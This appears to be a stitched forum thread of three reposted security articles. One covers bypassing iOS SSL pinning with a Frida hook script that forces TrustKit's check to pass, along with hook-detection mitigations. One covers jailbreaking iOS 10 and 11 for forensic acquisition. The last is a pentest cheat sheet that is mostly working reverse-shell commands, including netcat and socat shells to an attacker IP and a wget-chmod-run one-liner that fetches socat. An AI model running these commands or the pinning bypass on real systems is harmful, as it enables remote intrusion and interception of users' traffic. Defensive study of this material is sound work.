Popular Options The following libraries are popular options for implementing SSL pinning in Swift and Objective-C iOS applications. Name Pinning implementation Language Type Link NSURLSession Certificate file, public key Objective-C Apple networking library Link AlamoFire Certificate file, public key Swift Networking library Link AFNetworking Certificate file, public key Objective-C Networking library Link TrustKit Public key Objective-C SSL pinning Link NSURLSession is Apple’s API for facilitating network communication. It is a low-level framework, so implementing SSL pinning with it is hard and requires a lot of manual checks. TrustKit, AlamoFire and AFNetworking are widely used frameworks built on top of NSURLSession. Both AFNetworking and AlamoFire are full-fledged networking libraries that support SSL pinning checks as part of their API. TrustKit is a small framework that only implements SSL pinning checks. AFNetworking for Objective-C apps or AlamoFire for Swift apps are good choices when you are looking for a complete network library. If you only need SSL pinning, TrustKit is a good option. Bypass SSL pinning protection Bypassing SSL pinning can be achieved in one of two ways: By avoiding the SSL pinning check or discarding the result of the check. By replacing the pinned data in the application, for example the certificate asset or the hashed key. In the next sections, we will demonstrate both methods using a sample application and provide some suggestions on how to prevent tampering attempts. Test setup and goal We will show how to bypass TrustKit SSL pinning in the TrustKit demo application running on a jailbroken iPhone. We will be using the following tools. mitmproxy is used to analyze what data is being sent over the network. Alternative tools would be Burp Suite or Charles. Frida is used for hooking and patching methods. Other popular hooking frameworks are Cydia Substrate, Cycript or Substitute. 
To replace strings in the binary, we will use the Hopper disassembler.

The TrustKit demo application has minimal functionality. It only tries to connect to https://www.yahoo.com/ using an invalid pinned hash for that domain.

let trustKitConfig: [String: Any] = [
    kTSKSwizzleNetworkDelegates: false,
    kTSKPinnedDomains: [
        "yahoo.com": [
            kTSKEnforcePinning: true,
            kTSKIncludeSubdomains: true,
            kTSKPublicKeyAlgorithms: [kTSKAlgorithmRsa2048],
            // Invalid pins to demonstrate a pinning failure
            kTSKPublicKeyHashes: [
                "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
                "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB="
            ],
            kTSKReportUris: ["https://overmind.datatheorem.com/trustkit/report"],
        ],
        …

Note that even if the supplied hashes were valid for the yahoo.com domain, SSL pinning validation should still fail as long as we’re using a man-in-the-middle proxy.

When connecting to yahoo.com, mitmproxy shows us that the domain is not actually visited. Only the report of the SSL pinning verification is sent to the configured servers. The device itself displays a message that the pinning validation failed. All of this is expected behavior since SSL pinning is enabled.

Avoiding the SSL pinning check

We will explain how to bypass the SSL pinning check with Frida. Before we can try to bypass it, we need to find out where in the code the actual SSL pinning check is performed.

Finding the check

Since TrustKit is open source, we can easily find out where the actual certificate validation logic takes place: -[TSKPinningValidator evaluateTrust:forHostname:]. In cases in which the source code is not available, a good look at the API of the SSL pinning library will usually reveal where the actual validation work is done.

The signature of evaluateTrust:forHostname: contains a lot of information about the method.
- (TSKTrustDecision)evaluateTrust:(SecTrustRef _Nonnull)serverTrust forHostname:(NSString * _Nonnull)serverHostname The method is passed 2 arguments, including the hostname of the server that is being contacted, and it returns a TSKTrustDecision. The TSKTrustDecision type is a simple enum. /** Possible return values when verifying a server's identity against a set of pins. */ typedef NS_ENUM(NSInteger, TSKTrustEvaluationResult) { TSKTrustEvaluationSuccess, TSKTrustEvaluationFailedNoMatchingPin, TSKTrustEvaluationFailedInvalidCertificateChain, TSKTrustEvaluationErrorInvalidParameters, TSKTrustEvaluationFailedUserDefinedTrustAnchor, TSKTrustEvaluationErrorCouldNotGenerateSpkiHash, }; The source code documents each of these fields, but it is clear that the most interesting value is TSKTrustEvaluationSuccess. Bypassing the check To bypass the TrustKit SSL pinning check, we will hook the -[TSKPinningValidator evaluateTrust:forHostname:] method using Frida and ensure it always returns the required value. First, we create a Frida instrumentation script and save it as disable_trustkit.js. var evalTrust = ObjC.classes.TSKPinningValidator["- evaluateTrust:forHostname:"]; Interceptor.attach(evalTrust.implementation, { onLeave: function(retval) { console.log("Current return value: " + retval); retval.replace(0); console.log("Return value replaced with (TSKTrustDecision) \ TSKTrustDecisionShouldAllowConnection"); } }); This script will attach Frida to the evaluateTrust:forHostname: instance method in the TSKPinningValidator interface and execute the given code each time this method returns. The code replaces the return value with 0 (TSKTrustEvaluationSuccess) regardless of its previous value and logs this. We launch Frida and attach to the TrustKitDemo process on our device, executing our script: frida -U -l disable_trustkit.js -n TrustKitDemo-Swift. If we try to load https://www.yahoo.com now, we see in mitmproxy suite that the URL was loaded successfully. 
The device also shows that the pin validation succeeded. Locally, Frida returns the following output showing that the hook did what we expected. [iPhone::TrustKitDemo-Swift]-> Current return value: 0x1 Return value replaced with (TSKTrustDecision) TSKTrustDecisionShouldAllowConnection Current return value: 0x1 Return value replaced with (TSKTrustDecision) TSKTrustDecisionShouldAllowConnection We have now successfully bypassed TrustKit SSL pinning and are able to view and modify all web requests. Of course, this is only a very basic example of bypassing a single SSL pinning implementation through changing a return value. Off-the-shelf tools Bypassing SSL can be accomplished even easier using existing tweaks for jailbroken devices. SSL Kill Switch 2, for example, patches the low-level iOS TLS stack, disabling all SSL pinning implementations that use it. The Objection SSL Pinning disabler for Frida implements the low-level checks of SSL Kill Switch 2 and extends these with a few framework-specific hooks. The following table outlines the methods that can be hooked for some SSL pinning frameworks. libcoretls_cfhelpers.dylib tls_helper_create_peer_trust NSURLSession -[* URLSession:didReceiveChallenge:completionHandler:] NSURLConnection -[* connection:willSendRequestForAuthenticationChallenge:] AFNetworking -[AFSecurityPolicy setSSLPinningMode:] -[AFSecurityPolicy setAllowInvalidCertificates:] +[AFSecurityPolicy policyWithPinningMode:] +[AFSecurityPolicy policyWithPinningMode:withPinnedCertificates:] Mitigation: detect hooking Before verifying the SSL pin, we can verify the integrity of the above functions. As an example, we’ll use SSL Kill Switch 2 which is built on top of the ‘Cydia Substrate’ framework, a commonly used library for writing runtime hooks. Hooking in this framework is done through the MSHookFunction API. The method explained here is a proof-of-concept. Don’t use this hook detection code in production software. 
It is very basic and only detects a specific kind of hook on ARM64. Using this check without any additional obfuscation would also make it very easy to remove.

A common way of hooking native functions is to overwrite their first couple of instructions with a ‘trampoline’, a set of instructions responsible for diverting control flow to a new code fragment to replace or augment the original behavior. Using lldb, we can see exactly what this ‘trampoline’ looks like.

First 10 instructions of the unhooked function:

(lldb) dis -n tls_helper_create_peer_trust
libcoretls_cfhelpers.dylib`tls_helper_create_peer_trust:
0x1a8c13514 <+0>: stp x26, x25, [sp, #-0x50]!
0x1a8c13518 <+4>: stp x24, x23, [sp, #0x10]
0x1a8c1351c <+8>: stp x22, x21, [sp, #0x20]
0x1a8c13520 <+12>: stp x20, x19, [sp, #0x30]
0x1a8c13524 <+16>: stp x29, x30, [sp, #0x40]
0x1a8c13528 <+20>: add x29, sp, #0x40 ; =0x40
0x1a8c1352c <+24>: sub sp, sp, #0x20 ; =0x20
0x1a8c13530 <+28>: mov x19, x2
0x1a8c13534 <+32>: mov x24, x1
0x1a8c13538 <+36>: mov x21, x0

First 10 instructions of the hooked function:

(lldb) dis -n tls_helper_create_peer_trust
libcoretls_cfhelpers.dylib`tls_helper_create_peer_trust:
0x1a8c13514 <+0>: ldr x16, #0x8 ; <+8>
0x1a8c13518 <+4>: br x16
0x1a8c1351c <+8>: .long 0x00267c2c ; unknown opcode
0x1a8c13520 <+12>: .long 0x00000001 ; unknown opcode
0x1a8c13524 <+16>: stp x29, x30, [sp, #0x40]
0x1a8c13528 <+20>: add x29, sp, #0x40 ; =0x40
0x1a8c1352c <+24>: sub sp, sp, #0x20 ; =0x20
0x1a8c13530 <+28>: mov x19, x2
0x1a8c13534 <+32>: mov x24, x1
0x1a8c13538 <+36>: mov x21, x0

In the hooked function, the first 16 bytes form the trampoline. The address 0x00000001002ebc2c is loaded into register x16, after which execution jumps to that address (BR X16).
This address refers to SSLKillSwitch2.dylib`replaced_tls_helper_create_peer_trust, which is SSL Kill Switch 2’s replaced implementation.

(lldb) dis -a 0x00000001002ebc2c
SSLKillSwitch2.dylib`replaced_tls_helper_create_peer_trust:
0x1002ebc2c <+0>: sub sp, sp, #0x20 ; =0x20
0x1002ebc30 <+4>: mov w8, #0x0
0x1002ebc34 <+8>: str x0, [sp, #0x18]
0x1002ebc38 <+12>: strb w1, [sp, #0x17]
0x1002ebc3c <+16>: str x2, [sp, #0x8]
0x1002ebc40 <+20>: mov x0, x8
0x1002ebc44 <+24>: add sp, sp, #0x20 ; =0x20

If a function’s implementation is known in advance, the first few bytes of the found function can be compared to the known bytes, effectively ‘pinning’ the function implementation.

For Cydia Substrate, we see the function being patched with an unconditional branch to a register (BR Xn), so we can check if we find such an instruction in the first few bytes. If a branch instruction is found, we assume the function is hooked, otherwise we assume it is valid. For demonstration purposes, this simplified assumption will suffice.

To find a good mask to detect branch instructions, we had a look at the opcode tables in the GNU Binutils source code. The aarch64_opcode_table table contains ARM64 opcodes and a mask for the opcode.

struct aarch64_opcode aarch64_opcode_table[] = {
  ...
  /* Unconditional branch (register). */
  {"br", 0xd61f0000, 0xfffffc1f, branch_reg, 0, CORE, OP1 (Rn), QL_I1X, 0},
  {"blr", 0xd63f0000, 0xfffffc1f, branch_reg, 0, CORE, OP1 (Rn), QL_I1X, 0},
  {"ret", 0xd65f0000, 0xfffffc1f, branch_reg, 0, CORE, OP1 (Rn), QL_I1X, F_OPD0_OPT | F_DEFAULT (30)},
  ...

The entries are aarch64_opcode structs. From the opcode mask (0xfffffc1f) and the instruction representations, we can deduce that the opcode for unconditional branch to register value instructions must match 0xD61F0000.

#include <dlfcn.h>

// Only valid for ARM64.
int isSSLHooked() {
    void* (*createTrustFunc)() = dlsym(RTLD_DEFAULT, "tls_helper_create_peer_trust");
    if (createTrustFunc == 0x0) {
        // Unable to find symbol, assume function is hooked.
        return 1;
    }

    unsigned int *createTrustFuncAddr = (unsigned int *) createTrustFunc;

    // Verify whether one of the first three instructions is an
    // unconditional branch to register (BR Xn). BLR Xn and RET use
    // different opcodes and are not matched by this comparison.
    for (int i = 0; i < 3; i++) {
        unsigned int opCode = createTrustFuncAddr[i] & 0xfffffc1f;
        if (opCode == 0xD61F0000) {
            // Instruction found, function is hooked.
            return 1;
        }
    }

    // Function is not hooked through a trampoline.
    return 0;
}

We can call this function before an SSL pinning check is done, for example in loadUrl, and only start an SSL session if the checked function is not hooked.

Mitigation: name obfuscation

To bypass SSL pinning, the attacker first needs to find out which method he has to hook. By using a tool to obfuscate Swift and Objective-C metadata in their iOS app, developers can make it much more difficult for the attacker to determine which methods to hook. Name obfuscation will also throw off all automated tools that look for a known method name. An obfuscator can rename methods in a different way in each single build of the application, forcing an attacker to search for the actual name in each new version.

It is important to note that name obfuscation only protects against tools that bypass SSL checks implemented in the code of applications or in libraries included in the application. Tools that work by hooking system frameworks won’t be deterred by it.

Replacing SSL pinning data

The other way to bypass SSL pinning is to replace the pinned data inside the application. If we are able to replace the original pinned certificate file or public key string with one that belongs to our man-in-the-middle server, we would be pinning our own server.

Replacing an embedded certificate file can be as easy as swapping a file in the IPA package. In implementations that pin a hash of the server public key, we can replace the string with the hash of our own public key.
The screenshot below shows the TrustKit demo application loaded into Hopper. Hopper allows us to replace strings in the MachO file and reassemble it into a valid executable. Once the file or the string is replaced, the directory needs to be resigned and zipped as an IPA. This lies outside the scope of this blog, but more information can be found here. Mitigation: string encryption When pinning certificates with a list of hard-coded public key hashes, it is a good idea to encrypt the values. This doesn’t protect against hooking, but makes it much more difficult to replace the original hashes with those of an attacker certificate since these would have to be correctly encrypted as well. Mitigation: control flow obfuscation A reverse engineer can analyze the control flow of the application to find the location where the actual hash is verified. If he succeeds in finding it, he can see which strings are used and find out the location of the hash string in the binary. By obfuscating the control flow of the application, the app developer makes it much more difficult to perform a manual analysis of the code. Sursa: https://www.guardsquare.com/en/blog/iOS-SSL-certificate-pinning-bypassing
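The opcode mask used in the hook detection section can be checked against the trampoline shown in the lldb output. The sketch below is an illustration only: the instruction words in `UNHOOKED_PROLOGUE` and `HOOKED_PROLOGUE` are hand-assembled encodings of the listed instructions (an assumption, not bytes taken from a device), and the function names are hypothetical. Only the mask and the three opcode values come from the Binutils table quoted earlier.

```python
BRANCH_REG_MASK = 0xFFFFFC1F  # clears the Rn register field (bits 5-9)
BRANCH_REG_OPCODES = {
    0xD61F0000: "br",
    0xD63F0000: "blr",
    0xD65F0000: "ret",
}


def classify(word: int):
    """Return 'br', 'blr' or 'ret' if the word is a branch to register."""
    return BRANCH_REG_OPCODES.get(word & BRANCH_REG_MASK)


def find_branch_to_register(words, limit=3):
    """Scan the first `limit` instruction words for a branch to register."""
    for index, word in enumerate(words[:limit]):
        name = classify(word)
        if name is not None:
            return index, name
    return None


# Assumed encodings of: stp x26, x25, [sp, #-0x50]! / stp x24, x23, [sp, #0x10]
# / stp x22, x21, [sp, #0x20]
UNHOOKED_PROLOGUE = [0xA9BB67FA, 0xA9015FF8, 0xA90257F6]

# Assumed encodings of: ldr x16, #0x8 / br x16, followed by the two data
# words from the lldb listing.
HOOKED_PROLOGUE = [0x58000050, 0xD61F0200, 0x00267C2C, 0x00000001]

print(find_branch_to_register(UNHOOKED_PROLOGUE))
print(find_branch_to_register(HOOKED_PROLOGUE))
```

Matching RET as well would flag any function that legitimately returns within its first three instructions, so whether to include it is a trade-off between false positives and coverage.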
  20. Jailbreaking iOS 11 And All Versions Of iOS 10

POSTED BY SCAR ⋅ MARCH 30, 2018 FILED UNDER COMPUTER FORENSICS, DFIR, DIGITAL FORENSICS, IOS FORENSICS, JAILBREAKING

by Oleg Afonin, Mobile Product Specialist at ElcomSoft

Jailbreaking iOS is becoming increasingly difficult, especially considering the amounts of money Apple and independent bug hunters are paying for discovered vulnerabilities that could lead to a working exploit. Late last year, a bug hunter at Google’s Project Zero discovered one such vulnerability and developed and published an exploit that gave birth to a plethora of jailbreak tools for all versions of iOS 10 as well as iOS 11.0 through 11.1.2.

The newly emerged jailbreaks all exploit the same vulnerability. Moreover, they all use the same off-the-shelf exploit to jailbreak the device. However, there are major differences between them that are worth explaining.

Why Jailbreak?

Mobile forensic experts use jailbreaks for a different reason than enthusiast users. Jailbreaking, or obtaining root-level access to the file system, is a prerequisite for most physical acquisition tasks as it exposes the file system to forensic acquisition tools, helping circumvent iOS sandbox protection and access protected app data. Jailbreaking the device helps experts extract the largest amount of data from the device.

During jailbreaking, many software restrictions imposed by iOS are removed through the use of software exploits. Jailbreaking in general performs multiple tasks such as escaping the sandbox and bypassing kernel patch protection. For the mobile forensic expert, jailbreaking permits root access to the file system and allows establishing SSH connectivity to the device. This, in turn, allows accessing and extracting data that would otherwise be guarded by the operating system.

In this article, we’ll review the five latest jailbreaks for iOS 10.0 through 10.3.3 and 11.0 through 11.1.2.
iOS 10.0-10.3.3 (32-bit): h3lix
iOS 10.0-10.3.3 (64-bit): doubleH3lix, Meridian
iOS 10.3.x (64-bit, A7-A9 only): g0blin
iOS 11.0-11.1.2: LiberIOS
iOS 11.0-11.1.2: Electra

Before we review the individual jailbreak tools, let us first see what they have in common.

What Is a Jailbreak?

Jailbreaking modern versions of iOS is an extremely complex process exploiting multiple vulnerabilities in various parts of the OS to defeat the system’s security measures. In general terms, a jailbreak performs the following steps:

Sandbox Escape: during this step, the jailbreak tool uses an exploit that allows it to access components it does not have permission to access.
Privilege Escalation: the jailbreak gains elevated privileges allowing it to access protected resources (e.g. mount the root file system, patch the kernel, inject code etc.)
KPP Bypass: disables or works around the code signing check, which allows modifications to the file system without making the device unbootable, causing a bootloop or random reboots.

While getting more complicated, modern jailbreak tools are safer to use. Starting with iOS 11, all jailbreaks use the same installation procedure. A failed jailbreak does not cause system instability, and does not require reinstalling iOS in order to perform another attempt.

General Implications of Jailbreaking

The main purpose of a jailbreak is circumventing iOS security measures. A jailbroken device becomes vulnerable to attacks and malicious code unimaginable on a non-jailbroken device. Since a jailbreak allows installing unsigned code, a jailbroken iOS device starts behaving much like an Android device with the “Allow installation from unknown sources” option turned on. In addition, sideloaded apps on jailbroken devices may obtain full access to other apps’ sandboxed space, thus accessing personal (and highly sensitive) information they were never meant to access.

Forensic Implications of iOS 10 and 11 Jailbreaks

Jailbreak tools exploit vulnerabilities.
They can be picky, only supporting certain combinations of software (version of iOS) and hardware, allowing or disallowing third-party software repositories (Cydia) and potentially having other limitations. Installing a jailbreak brings the following forensic consequences. System and data partitions modified. A jailbreak unavoidably modifies both the system and user data partitions. This must be documented in order to maintain evidence admissibility. The jailbreak installation procedure (starting with iOS 10) requires a working Internet connection (to at least ppq.apple.com) from both the computer and the iOS device being jailbroken. If the iOS device has an outstanding remote wipe or iCloud lock request, it might be locked the instant the connection is established. Contacting Apple to ensure there are no such requests (as well as blocking subsequent requests) is a good idea. Jailbreaking an iOS device modifies both user data and system partitions. These modifications must be properly documented to maintain admissibility of collected evidence. At this time, it is not possible to perform a clean removal of the jailbreak. Modifications performed to the system partition are persistent; even a factory reset would not remove the jailbreak. While some jailbreak tools (e.g. Electra) claim to create an APFS snapshot to allow restoring the system to pre-jailbreak condition in the future, there are currently no tools available to perform such restore. Experts must carefully consider the above implications before attempting to jailbreak a device. Installing a Jailbreak All jailbreaks for iOS 10 and iOS 11 share a common installation procedure. Steps to jailbreak: Back up data with iTunes or Elcomsoft iOS Forensic Toolkit (if backup password is empty, specify and record a temporary password). Obtain and install the jailbreak tool using the appropriate links. 
This includes two files: the jailbreak IPA file and Cydia Impactor, available at http://www.cydiaimpactor.com/

Cydia Impactor (developed by Saurik) is used to sign the IPA file so that the jailbreak tool can be executed on iOS devices. You will need to use valid Apple ID credentials for signing the IPA. We recommend using a newly created Apple ID for signing the certificate.

Connect the iOS device to the computer, trust the computer on the iOS device and launch Cydia Impactor. Drag the jailbreak IPA onto the Cydia Impactor app. Provide the Apple ID and password when prompted. Click OK to allow Cydia Impactor to sign the IPA and upload it onto the iOS device. (A disposable Apple account is recommended; there is no need to use the same Apple ID as the main ID on the device.)

Cydia Impactor will sideload the IPA file onto the iOS device. If you attempt to launch the jailbreak IPA at this time, the attempt will fail as the digital certificate for that app is not yet trusted. You will need to trust the certificate in order to be able to launch the jailbreak. To do that, on the iOS device, open Settings > General > Device Management. You will see a developer profile under the “Apple ID” heading. Tap the profile to establish trust for this developer. (An Internet connection is required to verify the app developer’s certificate when establishing trust.)

On the iOS device, find the jailbreak app and run it. Follow the on-screen instructions. After you jailbreak, the device will respring.

Note that neither jailbreak will install the Cydia app; however, the jailbreak may already include a working SSH daemon (make sure to specify the correct port number in iOS Forensic Toolkit, which can be 22 or 2222). If it does not, or if the built-in SSH daemon does not work on either port number, download and install OpenSSH from Cydia. A working SSH connection is required to perform physical acquisition.
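Since the SSH daemon may listen on port 22 or 2222 depending on the jailbreak, a quick probe can tell which port to use. The sketch below is a generic check and not part of iOS Forensic Toolkit: the function names and the host address `192.0.2.10` are hypothetical, and it assumes the device is reachable over the network. It relies only on the fact that an SSH server announces itself with an identification string starting with `SSH-`.

```python
import socket

CANDIDATE_PORTS = (22, 2222)


def is_ssh_banner(data: bytes) -> bool:
    """SSH servers open the session with an 'SSH-...' identification string."""
    return data.startswith(b"SSH-")


def find_ssh_port(host: str, ports=CANDIDATE_PORTS, timeout: float = 3.0):
    """Return the first port that answers with an SSH banner, or None."""
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout) as conn:
                conn.settimeout(timeout)
                if is_ssh_banner(conn.recv(64)):
                    return port
        except OSError:
            # Refused, unreachable or timed out: try the next candidate.
            continue
    return None


if __name__ == "__main__":
    # Hypothetical device address; replace with the address of the device.
    print(find_ssh_port("192.0.2.10"))
```

If the probe returns `None` for both ports, no SSH daemon answered, which matches the case in which OpenSSH has to be installed from Cydia.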
iOS 11 Jailbreaks

There are two jailbreaks supporting physical acquisition with iOS Forensic Toolkit that are compatible with iOS 11.0 through 11.1.2. The LiberIOS and Electra jailbreaks are based on the exploit discovered by Google Project Zero. Both jailbreaks are compatible with iOS Forensic Toolkit. If one of the two jailbreaks does not work for a particular combination of hardware and iOS version, you may try rebooting the device and applying the other jailbreak.

- LiberIOS: http://newosxbook.com/liberios/
- Electra: https://coolstar.org/electra/

At this time, only the Electra jailbreak supports Cydia; LiberIOS does not. The latest build of Electra supports Cydia, with the Dropbear SSH daemon running on port 22.

Both jailbreaks employ a so-called ‘KPP-less’ approach to jailbreaking. In this approach, the jailbreak does not patch or otherwise alter the state of Apple’s Kernel Patch Protection (KPP) service that checks file system integrity during boot and then periodically while the system is running. All previous jailbreaks patched KPP (a so-called ‘KPP bypass’ approach). More information about KPP and how it was patched in earlier jailbreaks is available in How Kernel Patch Protection Works and How Hackers Bypass KPP.

LiberIOS and Electra employ a different approach, leaving KPP alone and writing into different areas of the file system instead. While this approach leads to a potentially more stable jailbreak, it also limits the ability to run Cydia Substrate, requiring its complete rework. At this time, only the Electra jailbreak has managed to include a working copy of Cydia in iOS 11.

In addition, the Electra jailbreak will create an APFS snapshot immediately after jailbreaking. The APFS snapshot can be best described as a file system-level restore point allowing you to roll back the root file system to exactly the state it was in immediately after jailbreaking.
By performing a factory reset afterwards, you will get a clean system without any traces of jailbreaking. Do note, however, that using the APFS snapshot to roll back the device requires a not yet released tool called SemiRestore11. According to the Electra jailbreak developer, this is how it works:

- Prior to jailbreaking, Electra RC 3.x/final release will check if your device is in a somewhat clean state
- If it is not in a somewhat clean state, it’ll give you a warning message and ask if you want to continue jailbreaking anyways
- However, if it is in a clean state, it will take an APFS snapshot of the root filesystem (/)
- Later on, if you would like to utilize SemiRestore, it will tell APFS to revert to the snapshot that Electra created when the device was first jailbroken
- After the APFS snapshot of the rootfs is reverted, you can “Reset all Contents and Settings” (which will wipe /var) and you will have a stock iPhone on iOS 11.0 – 11.1.2!

Both LiberIOS and Electra jailbreaks are semi-tethered. If you reboot the device, you will have to re-run the jailbreak app to activate the jailbreak. The jailbreak will expire after 7 days, after which you will have to re-run the entire procedure starting with using Cydia Impactor on your computer.

iOS 10 Jailbreaks

There are several iOS 10 jailbreaks based on the same vulnerability as the jailbreaks for iOS 11.

The h3lix (https://h3lix.tihmstar.net/) jailbreak supports all 32-bit devices that are running any iOS version between 10.0 and 10.3.3. h3lix is the only 32-bit jailbreak covering all versions of iOS 10 that is supported by iOS Forensic Toolkit.

The same developer released a version of the h3lix jailbreak for 64-bit devices running all versions of iOS 10.0 through 10.3.3. The doubleH3lix (https://doubleh3lix.tihmstar.net/) jailbreak includes the Cydia repository, but comes without a built-in SSH daemon. Installing OpenSSH from the Cydia store is obligatory to perform physical acquisition.
In our tests, we discovered that OpenSSH may not work immediately after the installation, requiring a phone reboot. After rebooting the phone, one must wait for 3 to 5 minutes before re-applying the jailbreak; otherwise, the jailbreak may fail with a “Kernel exploit failed” error followed by another reboot.

The Meridian (https://meridian.sparkes.zone/) jailbreak supports all 64-bit devices that are running any iOS version between 10.0 and 10.3.3. Notably, the iPhone 8, 8 Plus and iPhone X are missing from the list of supported devices as they were released with iOS 11 out of the box. Meridian is a KPP-less jailbreak. KPP-less is a new style of jailbreaking which avoids writing to certain protected areas of the kernel; this may cause issues with Cydia Substrate.

g0blin (https://g0blin.sticktron.net/) is a specific jailbreak that targets a limited set of iOS versions running on certain hardware. Specifically, the g0blin jailbreak targets iOS 10.3 through 10.3.3 running on devices equipped with A7 through A9 chipsets. This includes the iPad 5, iPad Air and Air 2, iPad Pro (2015), iPad mini 2 through 4, iPod Touch 6, as well as iPhone 5s, 6/Plus, SE and 6s/Plus. The reason for choosing this specific jailbreak would be compatibility. The g0blin jailbreak supports Cydia; the RC1 version of this tool includes Dropbear SSH (RC2 drops Dropbear support, making you install OpenSSH from the pre-installed Cydia app instead). For this reason, consider using either g0blin_rc2.ipa or the older g0blin_rc1.ipa depending on your requirements. RC2 supports a larger (yet unspecified) set of iOS/hardware combinations, while RC1 includes Dropbear SSH without the need to launch Cydia to manually install OpenSSH.

What Next?

Installing a jailbreak is a prerequisite for physical extraction. The process of physical extraction is described in Breaking into iOS 11.
An alternative to physical extraction is logical acquisition, which can be performed even on a locked device if a lockdown file (iTunes pairing record) is available. However, using existing pairing records becomes more complicated as iOS 11.3 limits the lifespan of lockdown records.

Conclusion

We described the differences between jailbreaks utilizing the newly discovered vulnerability published by Google Project Zero, and covered the steps to install and (for the iOS 11 Electra jailbreak) uninstall the jailbreaks.

Founded in 1990, ElcomSoft Co. Ltd. is a leading developer of digital forensics tools. The company offers state-of-the-art solutions for businesses, forensic and law enforcement specialists, and provides training and consulting services on mobile and computer forensics.

Source: https://articles.forensicfocus.com/2018/03/30/jailbreaking-ios-11-and-all-versions-of-ios-10/
  21. Upgrading simple shells to fully interactive TTYs
10 JULY 2017

Table of Contents
- Generating reverse shell commands
- Method 1: Python pty module
- Method 2: Using socat
- Method 3: Upgrading from netcat with magic
- tl;dr cheatsheet

Every pentester knows that amazing feeling when they catch a reverse shell with netcat and see that oh-so-satisfying verbose netcat message followed by output from id. And if other pentesters are like me, they also know that dreadful feeling when their shell is lost because they ran a bad command that hangs and accidentally hit "Ctrl-C", thinking it would stop the command, when instead it kills the entire connection.

Besides not correctly handling SIGINT, these "dumb" shells have other shortcomings as well:
- Some commands, like su and ssh, require a proper terminal to run
- STDERR usually isn't displayed
- Can't properly use text editors like vim
- No tab-complete
- No up arrow history
- No job control
- Etc...

Long story short, while these shells are great to catch, I'd much rather operate in a fully interactive TTY. I've come across some good resources that include very helpful tips and techniques for "upgrading" these shells, and wanted to compile and share them in a post. Along with Pentest Monkey, I also learned the techniques from Phineas Fisher in his released videos and writeups of his illegal activities:
- Pentest Monkey - Post Exploitation Without a TTY
- Phineas Fisher Hacks Catalan Police Union Website
- Phineas Fisher - Hackingteam Writeup

For reference, in all the screenshots and commands to follow, I am injecting commands into a vulnerable web server ("VICTIM") and catching shells from my Kali VM ("KALI"):
    VICTIM IP: 10.0.3.7
    KALI IP: 10.0.3.4

Generating reverse shell commands

Everyone is pretty familiar with the traditional way of using netcat to get a reverse shell:
    nc -e /bin/sh 10.0.3.4 4444
and catching it with:
    nc -lvp 4444
The problem is not every server has netcat installed, and not every version of netcat has the -e option.
Pentest Monkey has a great cheatsheet outlining a few different methods, but my favorite technique is to use Metasploit's msfvenom to generate the one-liner commands for me. Metasploit has several payloads under "cmd/unix" that can be used to generate one-liner bind or reverse shells.
[Screenshot: list of cmd/unix payloads]
Any of these payloads can be used with msfvenom to spit out the raw command needed (specifying LHOST, LPORT or RPORT). For example, here's a netcat command not requiring the -e flag:
[Screenshot: msfvenom output for a netcat one-liner without -e]
And here's a Perl one-liner in case netcat isn't installed:
[Screenshot: msfvenom output for a Perl one-liner]
These can all be caught by using netcat and listening on the port specified (4444).

Method 1: Python pty module

One of my go-to commands for a long time after catching a dumb shell was to use Python to spawn a pty. The pty module lets you spawn a pseudo-terminal that can fool commands like su into thinking they are being executed in a proper terminal. To upgrade a dumb shell, simply run the following command:
    python -c 'import pty; pty.spawn("/bin/bash")'
This will let you run su, for example (in addition to giving you a nicer prompt).

Unfortunately, this doesn't get around some of the other issues outlined above. SIGINT (Ctrl-C) will still close netcat, and there's no tab-completion or history. But it's a quick and dirty workaround that has helped me numerous times.

Method 2: Using socat

socat is like netcat on steroids and is a very powerful networking swiss-army knife. socat can be used to pass full TTYs over TCP connections. If socat is installed on the victim server, you can launch a reverse shell with it. You must catch the connection with socat as well to get the full functionality. The following commands will yield a fully interactive TTY reverse shell:

On Kali (listen):
    socat file:`tty`,raw,echo=0 tcp-listen:4444
On Victim (launch):
    socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

If socat isn't installed, you're not out of luck.
There are standalone binaries that can be downloaded from this awesome Github repo: https://github.com/andrew-d/static-binaries

With a command injection vuln, it's possible to download the correct architecture socat binary to a writable directory, chmod it, then execute a reverse shell in one line:
    wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
On Kali, you'll catch a fully interactive TTY session. It supports tab-completion, SIGINT/SIGTSTP, vim, up arrow history, etc. It's a full terminal. Pretty sweet.

Method 3: Upgrading from netcat with magic

I watched Phineas Fisher use this technique in his hacking video, and it feels like magic. Basically it is possible to use a dumb netcat shell to upgrade to a full TTY by setting some stty options within your Kali terminal.

First, follow the same technique as in Method 1 and use Python to spawn a PTY. Once bash is running in the PTY, background the shell with Ctrl-Z.

While the shell is in the background, examine the current terminal and STTY info so we can force the connected shell to match it:
[Screenshot: terminal type and stty settings of the Kali terminal]
The information needed is the TERM type ("xterm-256color") and the size of the current TTY ("rows 38; columns 116").

With the shell still backgrounded, set the current STTY to type raw and tell it to echo the input characters with the following command:
    stty raw -echo
With a raw stty, input/output will look weird and you won't see the next commands, but as you type they are being processed.

Next, foreground the shell with fg. It will re-open the reverse shell but formatting will be off. Finally, reinitialize the terminal with reset.

Note: I did not type the nc command again (as it might look above). I actually entered fg, but it was not echoed. The nc command is the job that is now in the foreground.
The reset command was then entered into the netcat shell.

After the reset the shell should look normal again. The last step is to set the shell, terminal type and stty size to match our current Kali window (from the info gathered above):
    $ export SHELL=bash
    $ export TERM=xterm-256color
    $ stty rows 38 columns 116
The end result is a fully interactive TTY with all the features we'd expect (tab-complete, history, job control, etc.), all over a netcat connection.

The possibilities are endless now. Tmux over a netcat shell?? Why not?

tl;dr cheatsheet

Cheatsheet commands:

Using Python for a pseudo terminal
    python -c 'import pty; pty.spawn("/bin/bash")'

Using socat
    # Listener:
    socat file:`tty`,raw,echo=0 tcp-listen:4444
    # Victim:
    socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Using stty options
    # In reverse shell
    $ python -c 'import pty; pty.spawn("/bin/bash")'
    Ctrl-Z
    # In Kali
    $ stty raw -echo
    $ fg
    # In reverse shell
    $ reset
